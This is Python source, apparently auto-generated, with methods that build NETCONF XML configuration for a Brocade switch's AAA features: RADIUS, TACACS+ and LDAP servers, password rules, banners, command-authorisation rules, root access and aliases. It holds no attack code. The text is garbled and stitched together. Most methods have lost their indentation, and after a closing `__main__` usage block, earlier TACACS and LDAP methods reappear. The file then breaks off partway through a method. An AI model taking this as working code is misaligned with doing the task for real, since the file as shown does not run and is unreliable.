host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def radius_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
radius_server = ET.SubElement(config, "radius-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(radius_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_protocol(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
protocol = ET.SubElement(host, "protocol")
protocol.text = kwargs.pop('protocol')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_key(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
key = ET.SubElement(host, "key")
key.text = kwargs.pop('key')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_encryption_level(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
encryption_level = ET.SubElement(host, "encryption-level")
encryption_level.text = kwargs.pop('encryption_level')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_tacacs_source_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
tacacs_source_ip = ET.SubElement(tacacs_server, "tacacs-source-ip")
tacacs_source_ip.text = kwargs.pop('tacacs_source_ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_retries(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
retries = ET.SubElement(host, "retries")
retries.text = kwargs.pop('retries')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_timeout(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_basedn(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
basedn = ET.SubElement(host, "basedn")
basedn.text = kwargs.pop('basedn')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_ad_group(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group = ET.SubElement(group, "ad-group")
ad_group.text = kwargs.pop('ad_group')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_maprole_group_switch_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
maprole = ET.SubElement(ldap_server, "maprole")
group = ET.SubElement(maprole, "group")
ad_group_key = ET.SubElement(group, "ad-group")
ad_group_key.text = kwargs.pop('ad_group')
switch_role = ET.SubElement(group, "switch-role")
switch_role.text = kwargs.pop('switch_role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_min_length(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
min_length = ET.SubElement(password_attributes, "min-length")
min_length.text = kwargs.pop('min_length')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_retry(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_retry = ET.SubElement(password_attributes, "max-retry")
max_retry.text = kwargs.pop('max_retry')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_max_lockout_duration(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
max_lockout_duration = ET.SubElement(password_attributes, "max-lockout-duration")
max_lockout_duration.text = kwargs.pop('max_lockout_duration')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
upper = ET.SubElement(character_restriction, "upper")
upper.text = kwargs.pop('upper')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
lower = ET.SubElement(character_restriction, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_numeric(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
numeric = ET.SubElement(character_restriction, "numeric")
numeric.text = kwargs.pop('numeric')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_character_restriction_special_char(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
character_restriction = ET.SubElement(password_attributes, "character-restriction")
special_char = ET.SubElement(character_restriction, "special-char")
special_char.text = kwargs.pop('special_char')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def password_attributes_admin_lockout_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
password_attributes = ET.SubElement(config, "password-attributes", xmlns="urn:brocade.com:mgmt:brocade-aaa")
admin_lockout_enable = ET.SubElement(password_attributes, "admin-lockout-enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_login(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
login = ET.SubElement(banner, "login")
login.text = kwargs.pop('login')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_motd(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
motd = ET.SubElement(banner, "motd")
motd.text = kwargs.pop('motd')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def banner_incoming(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
banner = ET.SubElement(config, "banner", xmlns="urn:brocade.com:mgmt:brocade-aaa")
incoming = ET.SubElement(banner, "incoming")
incoming.text = kwargs.pop('incoming')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_index(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index = ET.SubElement(rule, "index")
index.text = kwargs.pop('index')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_action(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
action = ET.SubElement(rule, "action")
action.text = kwargs.pop('action')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_operation(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
operation = ET.SubElement(rule, "operation")
operation.text = kwargs.pop('operation')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_role(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
role = ET.SubElement(rule, "role")
role.text = kwargs.pop('role')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_container_cmds_enumList(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
container_cmds = ET.SubElement(cmdlist, "container-cmds")
enumList = ET.SubElement(container_cmds, "enumList")
enumList.text = kwargs.pop('enumList')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_d_interface_fcoe_leaf_interface_fcoe_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_d = ET.SubElement(cmdlist, "interface-d")
interface_fcoe_leaf = ET.SubElement(interface_d, "interface-fcoe-leaf")
interface = ET.SubElement(interface_fcoe_leaf, "interface")
fcoe_leaf = ET.SubElement(interface, "fcoe-leaf")
fcoe_leaf.text = kwargs.pop('fcoe_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_e_interface_te_leaf_interface_tengigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_e = ET.SubElement(cmdlist, "interface-e")
interface_te_leaf = ET.SubElement(interface_e, "interface-te-leaf")
interface = ET.SubElement(interface_te_leaf, "interface")
tengigabitethernet_leaf = ET.SubElement(interface, "tengigabitethernet-leaf")
tengigabitethernet_leaf.text = kwargs.pop('tengigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_h_interface_ge_leaf_interface_gigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_h = ET.SubElement(cmdlist, "interface-h")
interface_ge_leaf = ET.SubElement(interface_h, "interface-ge-leaf")
interface = ET.SubElement(interface_ge_leaf, "interface")
gigabitethernet_leaf = ET.SubElement(interface, "gigabitethernet-leaf")
gigabitethernet_leaf.text = kwargs.pop('gigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_j_interface_pc_leaf_interface_port_channel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_j = ET.SubElement(cmdlist, "interface-j")
interface_pc_leaf = ET.SubElement(interface_j, "interface-pc-leaf")
interface = ET.SubElement(interface_pc_leaf, "interface")
port_channel_leaf = ET.SubElement(interface, "port-channel-leaf")
port_channel_leaf.text = kwargs.pop('port_channel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_l_interface_vlan_leaf_interface_vlan_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_l = ET.SubElement(cmdlist, "interface-l")
interface_vlan_leaf = ET.SubElement(interface_l, "interface-vlan-leaf")
interface = ET.SubElement(interface_vlan_leaf, "interface")
vlan_leaf = ET.SubElement(interface, "vlan-leaf")
vlan_leaf.text = kwargs.pop('vlan_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_m_interface_management_leaf_interface_management_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_m = ET.SubElement(cmdlist, "interface-m")
interface_management_leaf = ET.SubElement(interface_m, "interface-management-leaf")
interface = ET.SubElement(interface_management_leaf, "interface")
management_leaf = ET.SubElement(interface, "management-leaf")
management_leaf.text = kwargs.pop('management_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_o_interface_loopback_leaf_interface_loopback_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_o = ET.SubElement(cmdlist, "interface-o")
interface_loopback_leaf = ET.SubElement(interface_o, "interface-loopback-leaf")
interface = ET.SubElement(interface_loopback_leaf, "interface")
loopback_leaf = ET.SubElement(interface, "loopback-leaf")
loopback_leaf.text = kwargs.pop('loopback_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_q_interface_ve_leaf_interface_ve_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_q = ET.SubElement(cmdlist, "interface-q")
interface_ve_leaf = ET.SubElement(interface_q, "interface-ve-leaf")
interface = ET.SubElement(interface_ve_leaf, "interface")
ve_leaf = ET.SubElement(interface, "ve-leaf")
ve_leaf.text = kwargs.pop('ve_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_s_interface_fc_leaf_interface_fibrechannel_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_s = ET.SubElement(cmdlist, "interface-s")
interface_fc_leaf = ET.SubElement(interface_s, "interface-fc-leaf")
interface = ET.SubElement(interface_fc_leaf, "interface")
fibrechannel_leaf = ET.SubElement(interface, "fibrechannel-leaf")
fibrechannel_leaf.text = kwargs.pop('fibrechannel_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_u_interface_fe_leaf_interface_fortygigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_u = ET.SubElement(cmdlist, "interface-u")
interface_fe_leaf = ET.SubElement(interface_u, "interface-fe-leaf")
interface = ET.SubElement(interface_fe_leaf, "interface")
fortygigabitethernet_leaf = ET.SubElement(interface, "fortygigabitethernet-leaf")
fortygigabitethernet_leaf.text = kwargs.pop('fortygigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def rule_command_cmdlist_interface_w_interface_he_leaf_interface_hundredgigabitethernet_leaf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
rule = ET.SubElement(config, "rule", xmlns="urn:brocade.com:mgmt:brocade-aaa")
index_key = ET.SubElement(rule, "index")
index_key.text = kwargs.pop('index')
command = ET.SubElement(rule, "command")
cmdlist = ET.SubElement(command, "cmdlist")
interface_w = ET.SubElement(cmdlist, "interface-w")
interface_he_leaf = ET.SubElement(interface_w, "interface-he-leaf")
interface = ET.SubElement(interface_he_leaf, "interface")
hundredgigabitethernet_leaf = ET.SubElement(interface, "hundredgigabitethernet-leaf")
hundredgigabitethernet_leaf.text = kwargs.pop('hundredgigabitethernet_leaf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_enable(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
enable = ET.SubElement(root, "enable")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def root_sa_root_access(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
root_sa = ET.SubElement(config, "root-sa", xmlns="urn:brocade.com:mgmt:brocade-aaa")
root = ET.SubElement(root_sa, "root")
access = ET.SubElement(root, "access")
access.text = kwargs.pop('access')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name = ET.SubElement(alias, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_alias_expansion(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
alias = ET.SubElement(alias_config, "alias")
name_key = ET.SubElement(alias, "name")
name_key.text = kwargs.pop('name')
expansion = ET.SubElement(alias, "expansion")
expansion.text = kwargs.pop('expansion')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def alias_config_user_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
user = ET.SubElement(alias_config, "user")
name = ET.SubElement(user, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
    def alias_config_user_alias_name(self, **kwargs):
        """Auto Generated Code
        """
        config = ET.Element("config")
        alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
        user = ET.SubElement(alias_config, "user")
        name_key = ET.SubElement(user, "name")
        # The generator maps both the user key and the alias name leaf to
        # the same 'name' kwarg; pop it once so the second use cannot
        # raise KeyError.
        name_value = kwargs.pop('name')
        name_key.text = name_value
        alias = ET.SubElement(user, "alias")
        name = ET.SubElement(alias, "name")
        name.text = name_value
        callback = kwargs.pop('callback', self._callback)
        return callback(config)
    def alias_config_user_alias_expansion(self, **kwargs):
        """Auto Generated Code
        """
        config = ET.Element("config")
        alias_config = ET.SubElement(config, "alias-config", xmlns="urn:brocade.com:mgmt:brocade-aaa")
        user = ET.SubElement(alias_config, "user")
        name_key = ET.SubElement(user, "name")
        # Both list keys are generated from the single 'name' kwarg; pop
        # it once and reuse it to avoid a KeyError on the second pop.
        name_value = kwargs.pop('name')
        name_key.text = name_value
        alias = ET.SubElement(user, "alias")
        name_key = ET.SubElement(alias, "name")
        name_key.text = name_value
        expansion = ET.SubElement(alias, "expansion")
        expansion.text = kwargs.pop('expansion')
        callback = kwargs.pop('callback', self._callback)
        return callback(config)
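

if __name__ == '__main__':
    # Minimal usage sketch (illustrative only; the callback and the
    # example values below are assumptions, not part of the generated
    # API). A real deployment would pass a callback that pushes the
    # <config> element to a device over NETCONF; here we simply
    # serialize it for inspection.
    def _dump(config):
        return ET.tostring(config)

    device = brocade_aaa(callback=_dump)
    print(device.username_name(name='admin'))
    print(device.radius_server_host_use_vrf(hostname='10.0.0.1',
                                            use_vrf='mgmt-vrf'))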
host = ET.SubElement(tacacs_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
timeout = ET.SubElement(host, "timeout")
timeout.text = kwargs.pop('timeout')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def tacacs_server_tacacs_source_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
tacacs_server = ET.SubElement(config, "tacacs-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
tacacs_source_ip = ET.SubElement(tacacs_server, "tacacs-source-ip")
tacacs_source_ip.text = kwargs.pop('tacacs_source_ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_hostname(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
hostname = ET.SubElement(host, "hostname")
hostname.text = kwargs.pop('hostname')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_use_vrf(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf = ET.SubElement(host, "use-vrf")
use_vrf.text = kwargs.pop('use_vrf')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def ldap_server_host_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
ldap_server = ET.SubElement(config, "ldap-server", xmlns="urn:brocade.com:mgmt:brocade-aaa")
host = ET.SubElement(ldap_server, "host")
hostname_key = ET.SubElement(host, "hostname")
hostname_key.text = kwargs.pop('hostname')
use_vrf_key = ET.SubElement(host, "use-vrf")
use_vrf_key.text = kwargs.pop('use_vrf')
port = ET.SubElement(host, "port")
port.text = kwargs.pop('port')
